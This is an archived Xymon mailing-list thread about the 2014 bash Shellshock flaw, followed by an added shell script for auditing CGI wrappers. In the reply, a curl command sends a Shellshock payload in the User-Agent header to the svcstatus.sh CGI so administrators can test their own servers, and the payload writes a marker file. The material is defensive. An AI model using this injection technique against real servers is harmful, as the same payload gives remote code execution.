Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh
<html><head><title>Invalid request</title></head> <body>Invalid request</body></html>
your_workstation$
...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'
vulnerable
your_workstation$
...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message -----
From: "J.C. Cleaver" <user-87556346d4af@xymon.invalid>
To: xymon at xymon.com
Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain
Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi code (to set the environment properly), which means this would be an avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often /bin/sh on Linux distros) is another workaround. (This is the default on the Terabithia RPMS for EL6.)
More info:
http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://access.redhat.com/articles/1200223
Regards, -jc
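As an added example (not code from either message in this thread), two POSIX shell helpers for checking the two points raised above on your own Xymon host: whether the local bash still runs code appended to an exported function definition, and which CGI wrapper scripts in a directory are interpreted by bash rather than /bin/sh or /bin/dash. The wrapper file names other than svcstatus.sh, their contents and the directory are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the Xymon list thread. Sample wrapper scripts
# and their contents below are constructed for the demo.

# Returns 0 when the local bash ignores code trailing an exported function
# definition (patched), 1 when it still executes it, 2 when no bash is found.
local_bash_patched() {
    bash_bin="${1:-bash}"
    command -v "$bash_bin" >/dev/null 2>&1 || { echo "no bash binary found"; return 2; }
    # Same trick as the User-Agent test above, run locally against our own
    # bash: a patched bash only warns on stderr and then runs 'echo ok'.
    out=$(env x='() { :;}; echo VULNERABLE' "$bash_bin" -c 'echo ok' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) return 1 ;;
        *) return 0 ;;
    esac
}

# Prints every regular file in the directory whose #! line names bash.
# Wrappers interpreted by /bin/sh or /bin/dash (the workaround suggested
# in the thread) are not listed.
wrappers_using_bash() {
    dir="$1"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        case "$(head -n 1 "$f")" in
            '#!'*bash*) echo "$f" ;;
        esac
    done
}

# Builds three constructed wrapper scripts in a temp dir and audits them;
# only the bash-interpreted svcstatus.sh should be reported (paths are
# placeholders, not real Xymon install paths).
demo_wrapper_audit() {
    tmp=$(mktemp -d) || return 1
    printf '#!/bin/bash\nexec /placeholder/svcstatus.cgi "$@"\n' > "$tmp/svcstatus.sh"
    printf '#!/bin/dash\nexec /placeholder/other.cgi "$@"\n' > "$tmp/example-dash.sh"
    printf '#!/bin/sh\nexec /placeholder/third.cgi "$@"\n' > "$tmp/example-sh.sh"
    wrappers_using_bash "$tmp" | sed "s|^$tmp/||"
    rm -rf "$tmp"
}

# Usage: report bash-interpreted wrappers, then the state of the local bash.
demo_wrapper_audit
if local_bash_patched; then
    echo "local bash: patched"
else
    echo "local bash: not patched, or no bash found"
fi
```

Point wrappers_using_bash at your real CGI wrapper directory to see which scripts still go through bash after switching to /bin/dash.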